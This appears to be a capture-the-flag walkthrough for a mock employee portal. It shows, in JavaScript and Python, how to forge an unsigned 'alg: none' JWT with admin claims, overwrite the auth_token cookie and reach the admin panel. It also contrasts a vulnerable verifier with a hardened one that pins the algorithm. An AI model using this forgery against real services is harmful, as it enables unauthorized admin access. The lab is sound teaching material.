This corporate employee portal relies on JWT cookies to manage user sessions and access control, but the developers made a critical assumption about how tokens are validated. 🔐 What looks like a secure authentication system is waiting for the right manipulation to unlock administrative privileges. 💡 Master the art of JWT token forging and discover how a single cookie edit can grant access to the company's most sensitive data! 🕵️
Navigate to
to access the corporate employee portal. You'll see a login form where you can authenticate as a regular employee.
Use the provided test credentials to login (admin login is disabled for security):
After successful login, you'll be redirected to the employee dashboard where you can see basic employee information but no administrative functions. Note that direct admin login is not possible - you must use JWT manipulation.
Open browser Developer Tools (F12) and examine the cookies. You'll find an authentication cookie named auth_token containing a JWT. Copy this token and analyze its structure.
Decode the JWT payload (middle section) using Base64 decoding. You can use online tools like jwt.io or the browser console. JWT segments are base64url-encoded without padding (RFC 7515), so map '-' and '_' back to '+' and '/' before calling atob, which only understands standard Base64 (it tolerates the missing '=' padding):
// In browser console
let payload = 'eyJ1c2VyIjoiZW1wbG95ZWUiLCJyb2xlIjoiZW1wbG95ZWUiLCJleHAiOjE2OTQ1MjQ4MDB9';
// base64url -> standard base64 so atob accepts it
let standardB64 = payload.replace(/-/g, '+').replace(/_/g, '/');
console.log(JSON.parse(atob(standardB64)));
The decoded payload reveals:
{
"user": "employee",
"role": "employee",
"exp": 1694524800
}
The key vulnerability is that the application accepts JWT tokens with "alg": "none" in the header. The verifier trusts the algorithm named by the token rather than one chosen by the server, so for such a token no signature check is performed at all. This lets us forge tokens without knowing the signing secret: only the header and payload matter, and the signature segment is left empty.
Create a new JWT with administrative privileges:
// Step 1: Create new header with the 'none' algorithm
let newHeader = {
"typ": "JWT",
"alg": "none"
};
// Step 2: Create new payload with the admin role and a fresh expiry (one hour from now)
let newPayload = {
"user": "admin",
"role": "admin",
"exp": Math.floor(Date.now() / 1000) + 3600
};
// Step 3: Encode both parts as unpadded base64url (RFC 7515). btoa emits
// standard Base64, so swap '+'/'/' for '-'/'_' and strip the '=' padding
let b64url = s => btoa(s).replace(/\+/g, '-').replace(/\//g, '_').replace(/=/g, '');
let encodedHeader = b64url(JSON.stringify(newHeader));
let encodedPayload = b64url(JSON.stringify(newPayload));
// Step 4: Create the forged JWT. The trailing '.' leaves the signature segment
// empty, which is exactly what an 'alg: none' token looks like
let forgedJWT = encodedHeader + '.' + encodedPayload + '.';
console.log('Forged JWT:', forgedJWT);
In the browser Developer Tools, open the Application (Storage) tab, select Cookies for the portal's origin, and replace the value of the auth_token cookie with the forged JWT. Then navigate to /admin.
Alternatively, use the console:
// Replace the cookie with the forged JWT
document.cookie = 'auth_token=' + forgedJWT + '; path=/';
// Refresh the page so the server reads the new cookie
location.reload();
If the cookie was set with the HttpOnly flag, document.cookie can neither read nor overwrite it; in that case edit the value in the DevTools cookie editor or replay the request through an intercepting proxy.
After replacing the cookie, you should now have access to administrative functions. Navigate to /admin or look for admin menu options that weren't visible before.
In the admin panel at /admin, you'll find several sections:
The flag is located in the System Secrets section under Security Token. It will be displayed as a UUID format flag.
# Using Python
import base64
import json
import time

def b64url(raw: bytes) -> str:
    # JWT uses unpadded base64url, not plain Base64 (RFC 7515 appendix C)
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

header = {"typ": "JWT", "alg": "none"}
# Fresh expiry (one hour from now) so the token is not rejected as expired
payload = {"user": "admin", "role": "admin", "exp": int(time.time()) + 3600}
encoded_header = b64url(json.dumps(header, separators=(",", ":")).encode())
encoded_payload = b64url(json.dumps(payload, separators=(",", ":")).encode())
# Empty third segment: no signature for 'alg: none'
forged_jwt = f"{encoded_header}.{encoded_payload}."
print(forged_jwt)
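The walkthrough shows the forge from the attacker's side only. The following is an added example, not code from the lab or the original page, that works end to end on a token you actually hold: it decodes any real JWT (including the padding that the compact format strips), rewrites it as an alg=none token with chosen claims, and then contrasts the vulnerable server-side check that trusts the header's alg with the hardened check that pins the allowed algorithm. The HS256 secret and the sample employee token it mints are constructed for this example and are not the lab's real key or token.

```python
import base64
import hashlib
import hmac
import json
import time

# Constructed for this example only; the portal's real signing key is unknown.
EXAMPLE_SECRET = b"example-secret-not-the-labs-key"


def b64url_encode(raw: bytes) -> str:
    """Unpadded base64url, the JWT segment encoding (RFC 7515 appendix C)."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    """Restore the '=' padding JWT strips, then decode base64url."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _encode_parts(header: dict, payload: dict) -> str:
    """header.payload signing input with compact JSON, as issuers emit it."""
    return ".".join(
        b64url_encode(json.dumps(part, separators=(",", ":")).encode())
        for part in (header, payload))


def decode_jwt(token: str) -> tuple[dict, dict, str]:
    """Split a compact JWS into (header, payload, signature_b64). No verification."""
    header_b64, payload_b64, signature_b64 = token.split(".")
    return (json.loads(b64url_decode(header_b64)),
            json.loads(b64url_decode(payload_b64)),
            signature_b64)


def sign_hs256(header: dict, payload: dict, secret: bytes) -> str:
    """Mint a properly signed HS256 token; stands in for the portal's issuer."""
    signing_input = _encode_parts(header, payload)
    mac = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(mac)


def forge_none(token: str, **claims) -> str:
    """The walkthrough's manipulation on a real token: keep the header shape,
    switch alg to none, overwrite claims, and send an empty signature segment."""
    header, payload, _ = decode_jwt(token)
    header["alg"] = "none"
    payload.update(claims)
    return _encode_parts(header, payload) + "."


def _hs256_signature_ok(token: str, secret: bytes) -> bool:
    header_b64, payload_b64, sig_b64 = token.split(".")
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(),
                        hashlib.sha256).digest()
    return hmac.compare_digest(b64url_decode(sig_b64), expected)


def verify_vulnerable(token: str, secret: bytes) -> dict:
    """The bug the lab models: the token's header decides whether to verify."""
    header, payload, _ = decode_jwt(token)
    if header.get("alg") == "none":
        return payload                      # unsigned token accepted as-is
    if not _hs256_signature_ok(token, secret):
        raise ValueError("bad signature")
    return payload


def verify_hardened(token: str, secret: bytes, allowed=("HS256",)) -> dict:
    """The fix: the server pins the algorithm, then checks signature and expiry."""
    header, payload, _ = decode_jwt(token)
    if header.get("alg") not in allowed:
        raise ValueError(f"algorithm {header.get('alg')!r} not allowed")
    if not _hs256_signature_ok(token, secret):
        raise ValueError("bad signature")
    if payload.get("exp", 0) < time.time():
        raise ValueError("token expired")
    return payload


def is_rejected(token: str, secret: bytes) -> bool:
    """True if the hardened verifier refuses the token."""
    try:
        verify_hardened(token, secret)
        return False
    except ValueError:
        return True


def make_employee_token() -> str:
    """Constructed sample: the walkthrough's employee claims, freshly signed."""
    return sign_hs256({"typ": "JWT", "alg": "HS256"},
                      {"user": "employee", "role": "employee",
                       "exp": int(time.time()) + 3600}, EXAMPLE_SECRET)


if __name__ == "__main__":
    employee = make_employee_token()
    forged = forge_none(employee, user="admin", role="admin")
    print("forged:", forged)
    print("vulnerable verifier sees:", verify_vulnerable(forged, EXAMPLE_SECRET))
    print("hardened verifier rejects:", is_rejected(forged, EXAMPLE_SECRET))
```

Run it and compare the two verifiers on the same forged token: the vulnerable one returns the admin payload, the hardened one raises before it ever looks at the (absent) signature. In a real code base the equivalent of verify_hardened is passing an explicit algorithm allowlist to your JWT library rather than letting it read alg from the token.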
// Check user info with the forged JWT. Browsers refuse to set the Cookie
// header from script (it is a forbidden header name, so the original
// headers: { 'Cookie': ... } form is silently dropped). Rely instead on the
// auth_token value already written to document.cookie and ask fetch to send it
fetch('/api/user-info', { credentials: 'same-origin' })
  .then(r => r.json())
  .then(console.log);